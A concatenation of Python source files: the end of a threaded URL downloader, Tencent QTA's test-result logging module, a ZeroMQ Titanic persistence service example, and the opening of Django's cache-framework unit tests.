self.workers = [Download_Worker(self.queue, self.directory_path)
for pos in range(self.number_of_threads)]
# While the queue is not empty and the amount of threads are only 1
# NOTE: When all threads are done, there should only be the main thread
while not self.queue.empty() or active_count() > 1:
# logging.debug('QUEUE: ' + str(self.queue.qsize()))
sleep(0.1)
class Download_Worker():
def __init__(self, queue, directory_path):
# Init Queue
self.queue = queue
# Path to download to
if directory_path[-1:] != '/' or directory_path[-1:] != '\\':
self.directory_path = directory_path + '/'
else:
self.directory_path = directory_path
# Init Thread
self.thread = Thread(target=self.download, daemon=True, args=())
self.thread.start()
def delete_file(self, path: str):
# Delete path if exists
if os.path.exists(path):
os.remove(path)
def get_file_name(self, path: str):
# The name of the file will be extracted from the url.
file_name_start_pos = path.rfind('/') + 1
file_name = path[file_name_start_pos:]
return file_name
def download(self):
""" Downloads a url that is stored within the queue variable """
while not self.queue.empty():
try:
# Store the url to use
url = self.queue.get()
file_name = self.get_file_name(url)
# If a file within the directory exists, skip the file
if os.path.exists(self.directory_path + file_name):
logging.debug('Skipping: ' + url)
continue
# if self.queue.empty():
# return
# else:
# continue
# Attempt connection to url
req = requests.get(url, stream=True)
# If could not finish download alert user and skip
if req.status_code != 200:
logging.debug('Could not download:' + url)
continue
# Start storing the contents of the url within a file.
logging.info('Downloading: ' + url)
with open(self.directory_path + file_name, 'wb') as current_file:
req.raw.decode_content = True
shutil.copyfileobj(req.raw, current_file)
# print('\n' + url, '- Done.')
except Exception as e:
# If an error occured during downloading,
# then delete the incomplete file
logging.debug('ERROR DOWNLOADING: ' + str(e))
self.delete_file(self.directory_path + file_name)
|
testresult.py
|
# -*- coding: utf-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
'''
测试结果模块
参考logging模块的设计,使用示例如下::
result = TestResult()
result.add_handler(StreamResultHandler())
result.begin_test()
result.start_step('a step')
result.info('test')
result.end_test()
其中result.info接口可以传record扩展信息,比如::
result.error('', '异常发生', traceback=traceback.format_exc())
同logger一样,TestResult对象保证对所有的ITestResultHandler的调用都是线程安全的,可以通过实现
ITestResultHandler来实现一个新的Handler,详细请参考ITestResultHandler接口
'''
import json
import locale
import os
import six
import socket
import sys
import time
import threading
import traceback
import xml.dom.minidom as dom
import xml.parsers.expat as xmlexpat
import xml.sax.saxutils as saxutils
from testbase import context
from testbase.util import smart_text, get_thread_traceback, get_method_defined_class, \
to_pretty_xml, smart_binary, ensure_binary_stream, codecs_open, get_time_str, \
translate_bad_char, file_encoding, path_exists
os_encoding = locale.getdefaultlocale()[1]
class EnumLogLevel(object):
'''日志级别
'''
DEBUG = 10
INFO = 20
Environment = 21 # 测试环境相关信息, device/devices表示使用的设备、machine表示执行的机器
ENVIRONMENT = Environment
RESOURCE = 22
WARNING = 30
ERROR = 40
ASSERT = 41 # 断言失败,actual/expect/code_location
CRITICAL = 60
APPCRASH = 61 # 测试目标Crash
TESTTIMEOUT = 62 # 测试执行超时
RESNOTREADY = 69 # 当前资源不能满足测试执行的要求
levelname = {}
for name in EnumLogLevel.__dict__:
value = EnumLogLevel.__dict__[name]
if isinstance(value, int):
levelname[value] = name
def _convert_timelength(sec):
h = int(sec / 3600)
sec -= h * 3600
m = int(sec / 60)
sec -= m * 60
return (h, m, sec)
def smart_text_by_lines(s):
'''将任意字符串转换为UTF-8编码
'''
lines = []
for line in s.split('\n'):
lines.append(smart_text(line))
return '\n'.join(lines)
class TestResultBase(object):
'''测试结果基类
此类的职责如下:
1、提供测试结果基本接口
2、保证线程安全
2、测试是否通过之逻辑判断
'''
def __init__(self):
'''构造函数
'''
self.__lock = threading.RLock()
self.__steps_passed = [True] # 预设置一个,以防用例中没调用startStep
self.__curr_step = 0
self.__accept_result = False
self.__testcase = None
self.__begin_time = None
self.__end_time = None
self.__error_level = 0
self.__failed_info = ""
self.__failed_priority = 0
@property
def testcase(self):
'''对应的测试用例
:returns: TestCase
'''
return self.__testcase
@property
def passed(self):
'''测试是否通过
:returns: True or False
'''
return all(self.__steps_passed)
@property
def failed_reason(self):
'''用例测试不通过的错误原因
:returns: str
'''
if self.__error_level:
return levelname.get(self.__error_level, 'unknown')
else:
return ''
@property
def failed_info(self):
'''测试用例失败时的执行状况
:returns: str
'''
return self.__failed_info
@property
def begin_time(self):
'''测试用例开始时间
:returns: float
'''
return self.__begin_time
@property
def end_time(self):
'''测试用例结束时间
:returns: float
'''
return self.__end_time
def begin_test(self, testcase):
'''开始执行测试用例
:param testcase: 测试用例
:type testcase: TestCase
'''
with self.__lock:
if self.__accept_result:
raise RuntimeError("此时不可调用begin_test")
self.__accept_result = True
self.__begin_time = time.time()
self.handle_test_begin(testcase)
self.__testcase = testcase
def end_test(self):
'''结束执行测试用例
'''
with self.__lock:
if not self.__accept_result:
raise RuntimeError("此时不可调用end_test")
self.handle_step_end(self.__steps_passed[self.__curr_step])
self.__end_time = time.time()
self.handle_test_end(self.passed) # 防止没有一个步骤
self.__accept_result = False
def begin_step(self, msg):
'''开始一个测试步骤
:param msg: 测试步骤名称
:type msg: string
'''
with self.__lock:
if not self.__accept_result:
raise RuntimeError("此时不可调用begin_step")
if len(self.__steps_passed) != 1:
self.handle_step_end(self.__steps_passed[self.__curr_step])
self.__steps_passed.append(True)
self.__curr_step += 1
self.handle_step_begin(msg)
def log_record(self, level, msg, record=None, attachments=None):
'''处理一个日志记录
:param level: 日志级别,参考EnumLogLevel
:type level: string
:param msg: 日志消息
:type msg: string
:param record: 日志记录
:type record: dict
:param attachments: 附件
:type attachments: dict
'''
if record is None:
record = {}
if attachments is None:
attachments = {}
if not isinstance(msg, six.string_types):
raise ValueError("msg='%r'必须是string类型" % msg)
msg = smart_text(msg)
if level >= EnumLogLevel.ERROR:
self.__steps_passed[self.__curr_step] = False
if level > self.__error_level:
self.__error_level = level
extra_record, extra_attachments = self._get_extra_fail_record_safe()
record.update(extra_record)
attachments.update(extra_attachments)
if self.__failed_priority <= 3 and level == EnumLogLevel.APPCRASH:
self.__failed_info, self.__failed_priority = "Crash", 3
if self.__failed_priority <= 2 and level == EnumLogLevel.TESTTIMEOUT:
self.__failed_info, self.__failed_priority = "用例执行超时", 2
if self.__failed_priority <= 1 and level == EnumLogLevel.ASSERT:
self.__failed_info, self.__failed_priority = msg, 1
if self.__failed_priority <= 1 and "traceback" in record:
if not self.__failed_info: # 优先记录第一个异常,第一个异常往往比较大可能是问题的原因
self.__failed_info, self.__failed_priority = record["traceback"].split('\n')[-2], 1
with self.__lock:
if not self.__accept_result:
return
self.handle_log_record(level, msg, record, attachments)
def _get_extra_fail_record_safe(self, timeout=300):
'''使用线程调用测试用例的get_extra_fail_record
'''
def _run(outputs, errors):
try:
outputs.append(context.current_testcase().get_extra_fail_record())
except:
errors.append(traceback.format_exc())
errors = []
outputs = []
t = threading.Thread(target=_run, args=(outputs, errors))
t.daemon = True
t.start()
t.join(timeout)
extra_record, extra_attachments = {}, {}
with self.__lock:
if t.is_alive():
stack = get_thread_traceback(t)
self.handle_log_record(EnumLogLevel.ERROR, '测试失败时获取其他额外错误信息超过了指定时间:%ds' % timeout,
{'traceback':stack},
{})
else:
if errors:
self.handle_log_record(EnumLogLevel.ERROR, '测试失败时获取其他额外错误信息失败',
{'traceback':errors[0]}, {})
else:
record_info = outputs[0]
if isinstance(record_info, (tuple, list)) and len(record_info) == 2:
extra_record, extra_attachments = record_info
else:
cls = get_method_defined_class(self.testcase.get_extra_fail_record)
if cls.__module__ == '__main__':
class_path = cls.__name__
else:
class_path = "%s.%s" % (cls.__module__, cls.__name__)
raise RuntimeError("%s.get_extra_fail_record must return a 2 elements tuple" % class_path)
return extra_record, extra_attachments
def debug(self, msg, record=None, attachments=None):
'''处理一个DEBUG日志
'''
self.log_record(EnumLogLevel.DEBUG, msg, record, attachments)
def info(self, msg, record=None, attachments=None):
'''处理一个INFO日志
'''
self.log_record(EnumLogLevel.INFO, msg, record, attachments)
def warning(self, msg, record=None, attachments=None):
'''处理一个WARNING日志
'''
self.log_record(EnumLogLevel.WARNING, msg, record, attachments)
def error(self, msg, record=None, attachments=None):
'''处理一个ERROR日志
'''
self.log_record(EnumLogLevel.ERROR, msg, record, attachments)
def exception(self, msg, record=None, attachments=None):
'''处理一个DEBUG日志
'''
if record is None:
record = {}
record['traceback'] = traceback.format_exc()
self.log_record(EnumLogLevel.CRITICAL, msg, record, attachments)
def handle_test_begin(self, testcase):
'''处理一个测试用例执行的开始
:param testcase: 测试用例
:type testcase: TestCase
'''
pass
def handle_test_end(self, passed):
'''处理一个测试用例执行的结束
:param passed: 测试用例是否通过
:type passed: boolean
'''
pass
def handle_step_begin(self, msg):
'''处理一个测试步骤的开始
:param msg: 测试步骤名称
:type msg: string
'''
pass
def handle_step_end(self, passed):
'''处理一个测试步骤的结束
:param passed: 测试步骤是否通过
:type passed: boolean
'''
pass
def handle_log_record(self, level, msg, record, attachments):
'''处理一个日志记录
:param level: 日志级别,参考EnumLogLevel
:type level: string
:param msg: 日志消息
:type msg: string
:param record: 日志记录
:type record: dict
:param attachments: 附件
:type attachments: dict
'''
pass
class EmptyResult(TestResultBase):
'''不输出
'''
pass
class StreamResult(TestResultBase):
'''测试用例stream输出
'''
_seperator1 = "-" * 40 + "\n"
_seperator2 = "=" * 60 + "\n"
def __init__(self, stream=sys.stdout):
'''构造函数
:param stream: 流对象
:type stream: file
'''
super(StreamResult, self).__init__()
self._stream, encoding = ensure_binary_stream(stream)
self._write = lambda x: self._stream.write(smart_binary(x, encoding=encoding))
self._step_results = []
def handle_test_begin(self, testcase):
'''处理一个测试用例执行的开始
:param testcase: 测试用例
:type testcase: TestCase
'''
self._write(self._seperator2)
owner = getattr(testcase, 'owner', None)
priority = getattr(testcase, 'priority', None)
timeout = getattr(testcase, 'timeout', None)
begin_msg = "测试用例:%s 所有者:%s 优先级:%s 超时:%s分钟\n" % (testcase.test_name, owner, priority, timeout)
self._write(begin_msg)
self._write(self._seperator2)
def handle_test_end(self, passed):
'''处理一个测试用例执行的结束
:param passed: 测试用例是否通过
:type passed: boolean
'''
self._write(self._seperator2)
self._write("测试用例开始时间: %s\n" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time)))
self._write("测试用例结束时间: %s\n" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.end_time)))
self._write("测试用例执行时间: %02d:%02d:%02.2f\n" % _convert_timelength(self.end_time - self.begin_time))
rsttxts = {True:'通过', False:'失败'}
steptxt = ''
for i, ipassed in enumerate(self._step_results):
steptxt += " %s:%s" % (i + 1, rsttxts[ipassed])
self._write("测试用例步骤结果: %s\n" % steptxt)
self._write("测试用例最终结果: %s\n" % rsttxts[passed])
self._write(self._seperator2)
def handle_step_begin(self, msg):
'''处理一个测试步骤的开始
:param msg: 测试步骤名称
:type msg: string
'''
if not isinstance(msg, six.string_types):
raise ValueError("msg='%r'必须是string类型" % msg)
self._write(self._seperator1)
self._write("步骤%s: %s\n" % (len(self._step_results) + 1, msg))
def handle_step_end(self, passed):
'''处理一个测试步骤的结束
:param passed: 测试步骤是否通过
:type passed: boolean
'''
self._step_results.append(passed)
def handle_log_record(self, level, msg, record, attachments):
'''处理一个日志记录
:param level: 日志级别,参考EnumLogLevel
:type level: string
:param msg: 日志消息
:type msg: string
:param record: 日志记录
:type record: dict
:param attachments: 附件
:type attachments: dict
'''
self._write("%s: %s\n" % (levelname[level], msg))
if level == EnumLogLevel.ASSERT:
if "actual" in record:
actual = record["actual"]
self._write(" 实际值:%s%s\n" % (actual.__class__, actual))
if "expect" in record:
expect = record["expect"]
self._write(" 期望值:%s%s\n" % (expect.__class__, expect))
if "code_location" in record:
self._write(smart_text(' File "%s", line %s, in %s\n' % record["code_location"]))
if "traceback" in record:
self._write(smart_text_by_lines("%s\n" % record["traceback"]))
for name in attachments:
file_path = smart_text(attachments[name])
if path_exists(file_path):
file_path = os.path.abspath(file_path)
self._write(" %s:%s\n" % (smart_text(name), file_path))
class XmlResult(TestResultBase):
'''xml格式的测试用例结果
'''
def __init__(self, testcase):
'''构造函数
:param file_path: XML文件路径
:type file_path: string
'''
super(XmlResult, self).__init__()
self._xmldoc = dom.Document()
translated_name = translate_bad_char(testcase.test_name)
max_name_len = 200
if len(translated_name) > max_name_len:
translated_name = translated_name[:max_name_len]
self._file_path = '%s_%s.xml' % (translated_name, get_time_str())
@property
def file_path(self):
'''xml文件路径
:returns: str
'''
return self._file_path
def handle_test_begin(self, testcase):
'''处理一个测试用例执行的开始
:param testcase: 测试用例
:type testcase: TestCase
'''
self._xmldoc.appendChild(self._xmldoc.createProcessingInstruction("xml-stylesheet", 'type="text/xsl" href="TestResult.xsl"'))
owner = getattr(testcase, 'owner', None)
priority = getattr(testcase, 'priority', None)
timeout = getattr(testcase, 'timeout', None)
self._testnode = self._xmldoc.createElement('TEST')
self._testnode.setAttribute("name", smart_text(saxutils.escape(testcase.test_name)))
self._testnode.setAttribute("owner", smart_text(saxutils.escape(str(owner))))
self._testnode.setAttribute("priority", str(priority))
self._testnode.setAttribute("timeout", str(timeout))
self._testnode.setAttribute('begintime', time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time)))
self._xmldoc.appendChild(self._testnode)
self.begin_step('测试用例初始步骤')
def handle_test_end(self, passed):
'''处理一个测试用例执行的结束
:param passed: 测试用例是否通过
:type passed: boolean
'''
self._testnode.setAttribute('result', str(passed))
self._testnode.setAttribute('endtime', time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.end_time)))
self._testnode.setAttribute('duration', "%02d:%02d:%02.2f\n" % _convert_timelength(self.end_time - self.begin_time))
if self._file_path:
with codecs_open(smart_text(self._file_path), 'wb') as fd:
fd.write(to_pretty_xml(self._xmldoc))
def handle_step_begin(self, msg):
'''处理一个测试步骤的开始
:param msg: 测试步骤名称
:type msg: string
'''
if not isinstance(msg, six.string_types):
raise ValueError("msg='%r'必须是string类型" % msg)
self._stepnode = self._xmldoc.createElement("STEP")
self._stepnode.setAttribute('title', smart_text(msg))
self._stepnode.setAttribute('time', time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time())))
self._testnode.appendChild(self._stepnode)
def handle_step_end(self, passed):
'''处理一个测试步骤的结束
:param passed: 测试步骤是否通过
:type passed: boolean
'''
self._stepnode.setAttribute('result', str(passed))
def handle_log_record(self, level, msg, record, attachments):
'''处理一个日志记录
:param level: 日志级别,参考EnumLogLevel
:type level: string
:param msg: 日志消息
:type msg: string
:param record: 日志记录
:type record: dict
:param attachments: 附件
:type attachments: dict
'''
if not isinstance(msg, six.string_types):
msg = str(msg)
# 由于目前的报告系统仅支持部分级别的标签,所以这里先做转换
if level >= EnumLogLevel.ERROR:
tagname = levelname[EnumLogLevel.ERROR]
elif level == EnumLogLevel.Environment or level == EnumLogLevel.RESOURCE:
tagname = levelname[EnumLogLevel.INFO]
else:
tagname = levelname[level]
infonode = self._xmldoc.createElement(tagname)
textnode = self._xmldoc.createTextNode(smart_text(msg))
infonode.appendChild(textnode)
self._stepnode.appendChild(infonode)
if level == EnumLogLevel.ASSERT:
if "actual" in record:
node = self._xmldoc.createElement("ACTUAL")
try:
actual = record["actual"]
if isinstance(actual, six.string_types):
actual = smart_text(actual)
dom.parseString("<a>%s</a>" % actual)
acttxt = "%s%s" % (actual.__class__, actual)
except xmlexpat.ExpatError:
acttxt = "%s%s" % (actual.__class__, repr(actual))
except UnicodeEncodeError:
acttxt = "%s%s" % (actual.__class__, repr(actual))
node.appendChild(self._xmldoc.createTextNode(acttxt))
infonode.appendChild(node)
if "expect" in record:
node = self._xmldoc.createElement("EXPECT")
try:
expect = record["expect"]
if isinstance(expect, six.string_types):
expect = smart_text(expect)
dom.parseString("<a>%s</a>" % expect)
exptxt = "%s%s" % (expect.__class__, expect)
except xmlexpat.ExpatError:
exptxt = "%s%s" % (expect.__class__, repr(expect))
except UnicodeEncodeError:
exptxt = "%s%s" % (expect.__class__, repr(expect))
node.appendChild(self._xmldoc.createTextNode(exptxt))
infonode.appendChild(node)
if "traceback" in record:
excnode = self._xmldoc.createElement('EXCEPT')
excnode.appendChild(self._xmldoc.createTextNode(smart_text(record["traceback"])))
infonode.appendChild(excnode)
for name in attachments:
file_path = attachments[name]
attnode = self._xmldoc.createElement('ATTACHMENT')
attnode.setAttribute('filepath', smart_text(file_path))
attnode.appendChild(self._xmldoc.createTextNode(smart_text(name)))
infonode.appendChild(attnode)
def toxml(self):
'''返回xml文本
:returns string - xml文本
'''
return to_pretty_xml(self._xmldoc)
class JSONResult(TestResultBase):
'''JSON格式的结果
'''
def __init__(self, testcase):
super(JSONResult, self).__init__()
self._steps = []
self._data = {
"testcase": testcase.test_name,
"steps": self._steps,
"failed_info": "",
}
self._translated_name = translate_bad_char(testcase.test_name)
def get_data(self):
return self._data
def get_file(self):
file_name = '%s_%s.json' % (self._translated_name, get_time_str())
if not path_exists(file_name):
content = json.dumps(self._data)
with codecs_open(file_name, mode="w", encoding="utf-8") as fd:
fd.write(content)
return file_name
def handle_test_begin(self, testcase):
'''处理一个测试用例执行的开始
:param testcase: 测试用例
:type testcase: TestCase
'''
self.begin_step("测试用例初始化步骤")
def handle_test_end(self, passed):
'''处理一个测试用例执行的结束
:param passed: 测试用例是否通过
:type passed: boolean
'''
self._data["succeed"] = passed
self._data["start_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time))
self._data["end_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.end_time))
self._data["failed_info"] = self.failed_info
def handle_step_begin(self, msg):
'''处理一个测试步骤的开始
:param msg: 测试步骤名称
:type msg: string
'''
self._steps.append({
"name": msg,
"start_time": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
"logs": []
})
def handle_step_end(self, passed):
'''处理一个测试步骤的结束
:param passed: 测试步骤是否通过
:type passed: boolean
'''
curr_step = self._steps[-1]
curr_step["succeed"] = passed
curr_step["end_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
def handle_log_record(self, level, msg, record, attachments):
'''处理一个日志记录
:param level: 日志级别,参考EnumLogLevel
:type level: string
:param msg: 日志消息
:type msg: string
:param record: 日志记录
:type record: dict
:param attachments: 附件
:type attachments: dict
'''
curr_step = self._steps[-1]
curr_step["logs"].append({
"timestamp": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
"level": level,
"message": msg,
"record": record,
"attachments": attachments
})
class HtmlResult(JSONResult):
"""html test result
"""
def get_file(self):
file_name = '%s_%s.js' % (self._translated_name, get_time_str())
if not path_exists(file_name):
var_name = os.path.basename(file_name)
var_name = os.path.splitext(file_name)[0].replace(".", "_")
content = "var %s = %s" % (var_name, json.dumps(self._data))
content = smart_binary(content)
with codecs_open(file_name, mode="wb") as fd:
fd.write(content)
return file_name
class TestResultCollection(list):
'''测试结果集合
'''
def __init__(self, results, passed):
'''构造函数
:param results: 测试结果列表
:type results: list
:param passed: 测试是否通过
:type passed: boolean
'''
super(TestResultCollection, self).__init__(results)
self.__passed = passed
@property
def passed(self):
'''测试是否通过
:returns: boolean
'''
return self.__passed
|
titanic.py
|
"""
Titanic service
Implements server side of http:#rfc.zeromq.org/spec:9
Author: Min RK <benjaminrk@gmail.com>
"""
import cPickle as pickle
import os
import sys
import threading
import time
from uuid import uuid4
import zmq
from mdwrkapi import MajorDomoWorker
from mdcliapi import MajorDomoClient
from zhelpers import zpipe
TITANIC_DIR = ".titanic"
def request_filename (uuid):
"""Returns freshly allocated request filename for given UUID"""
return os.path.join(TITANIC_DIR, "%s.req" % uuid)
#
def reply_filename (uuid):
"""Returns freshly allocated reply filename for given UUID"""
return os.path.join(TITANIC_DIR, "%s.rep" % uuid)
# ---------------------------------------------------------------------
# Titanic request service
def titanic_request (pipe):
worker = MajorDomoWorker("tcp://localhost:5555", "titanic.request")
reply = None
while True:
# Send reply if it's not null
# And then get next request from broker
request = worker.recv(reply)
if not request:
break # Interrupted, exit
# Ensure message directory exists
if not os.path.exists(TITANIC_DIR):
os.mkdir(TITANIC_DIR)
# Generate UUID and save message to disk
uuid = uuid4().hex
filename = request_filename (uuid)
with open(filename, 'w') as f:
pickle.dump(request, f)
# Send UUID through to message queue
pipe.send(uuid)
# Now send UUID back to client
# Done by the worker.recv() at the top of the loop
reply = ["200", uuid]
# ---------------------------------------------------------------------
# Titanic reply service
def titanic_reply ():
worker = MajorDomoWorker("tcp://localhost:5555", "titanic.reply")
reply = None
while True:
request = worker.recv(reply)
if not request:
break # Interrupted, exit
uuid = request.pop(0)
req_filename = request_filename(uuid)
rep_filename = reply_filename(uuid)
if os.path.exists(rep_filename):
with open(rep_filename, 'r') as f:
reply = pickle.load(f)
reply = ["200"] + reply
else:
if os.path.exists(req_filename):
reply = ["300"] # pending
else:
reply = ["400"] # unknown
# ---------------------------------------------------------------------
# Titanic close service
def titanic_close():
worker = MajorDomoWorker("tcp://localhost:5555", "titanic.close")
reply = None
while True:
request = worker.recv(reply)
if not request:
break # Interrupted, exit
uuid = request.pop(0)
req_filename = request_filename(uuid)
rep_filename = reply_filename(uuid)
# should these be protected? Does zfile_delete ignore files
# that have already been removed? That's what we are doing here.
if os.path.exists(req_filename):
os.remove(req_filename)
if os.path.exists(rep_filename):
os.remove(rep_filename)
reply = ["200"]
def service_success(client, uuid):
"""Attempt to process a single request, return True if successful"""
# Load request message, service will be first frame
filename = request_filename (uuid)
# If the client already closed request, treat as successful
if not os.path.exists(filename):
return True
with open(filename, 'r') as f:
request = pickle.load(f)
service = request.pop(0)
# Use MMI protocol to check if service is available
mmi_request = [service]
mmi_reply = client.send("mmi.service", mmi_request)
service_ok = mmi_reply and mmi_reply[0] == "200"
if service_ok:
reply = client.send(service, request)
if reply:
filename = reply_filename (uuid)
with open(filename, "w") as f:
pickle.dump(reply, f)
return True
return False
def main():
verbose = '-v' in sys.argv
ctx = zmq.Context()
# Create MDP client session with short timeout
client = MajorDomoClient("tcp://localhost:5555", verbose)
client.timeout = 1000 # 1 sec
client.retries = 1 # only 1 retry
request_pipe, peer = zpipe(ctx)
request_thread = threading.Thread(target=titanic_request, args=(peer,))
request_thread.daemon = True
request_thread.start()
reply_thread = threading.Thread(target=titanic_reply)
reply_thread.daemon = True
reply_thread.start()
close_thread = threading.Thread(target=titanic_close)
close_thread.daemon = True
close_thread.start()
poller = zmq.Poller()
poller.register(request_pipe, zmq.POLLIN)
# Main dispatcher loop
while True:
# Ensure message directory exists
if not os.path.exists(TITANIC_DIR):
os.mkdir(TITANIC_DIR)
# We'll dispatch once per second, if there's no activity
try:
items = poller.poll(1000)
except KeyboardInterrupt:
break; # Interrupted
if items:
# Append UUID to queue, prefixed with '-' for pending
uuid = request_pipe.recv()
with open(os.path.join(TITANIC_DIR, 'queue'), 'a') as f:
f.write("-%s\n" % uuid)
# Brute-force dispatcher
#
with open(os.path.join(TITANIC_DIR, 'queue'), 'r+b') as f:
for entry in f.readlines():
# UUID is prefixed with '-' if still waiting
if entry[0] == '-':
uuid = entry[1:].rstrip() # rstrip '\n' etc.
print "I: processing request %s" % uuid
if service_success(client, uuid):
# mark queue entry as processed
here = f.tell()
f.seek(-1*len(entry), os.SEEK_CUR)
f.write('+')
f.seek(here, os.SEEK_SET)
if __name__ == '__main__':
main()
|
tests.py
|
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import sys
import tempfile
import threading
import time
import unittest
import warnings
from pathlib import Path
from unittest import mock, skipIf
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheHandler, CacheKeyWarning, InvalidCacheKey, cache,
caches,
)
from django.core.cache.backends.base import InvalidCacheBackendError
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
ignore_warnings, override_settings,
)
from django.test.signals import setting_changed
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers,
)
from django.utils.deprecation import RemovedInDjango41Warning
from django.views.decorators.cache import cache_control, cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable:
def __getstate__(self):
raise pickle.PickleError()
def empty_response(request):
return HttpResponse()
KEY_ERRORS_WITH_MEMCACHED_MSG = (
'Cache key contains characters that will cause errors if used with '
'memcached: %r'
)
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
self.assertIs(cache.add("addkey1", "value"), True)
self.assertIs(cache.add("addkey1", "newvalue"), True)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Nonexistent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_get_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.get_many(['key with spaces'])
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertIsNone(cache.get("key1"))
self.assertIs(cache.delete("key1"), False)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertIs(cache.has_key("hello1"), False)
self.assertIs(cache.has_key("goodbye1"), False)
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_touch(self):
"""Dummy cache can't do touch()."""
self.assertIs(cache.touch('whatever'), False)
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
self.assertIs(cache.add("expire2", "newvalue"), True)
self.assertIsNone(cache.get("expire2"))
self.assertIs(cache.has_key("expire3"), False)
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
self.assertEqual(cache.set_many({'a': 1, 'b': 2}), [])
self.assertEqual(cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1'), [])
def test_set_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.set_many({'key with spaces': 'foo'})
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_delete_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.delete_many({'key with spaces': 'foo'})
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertIsNone(cache.get_or_set('mykey', None))
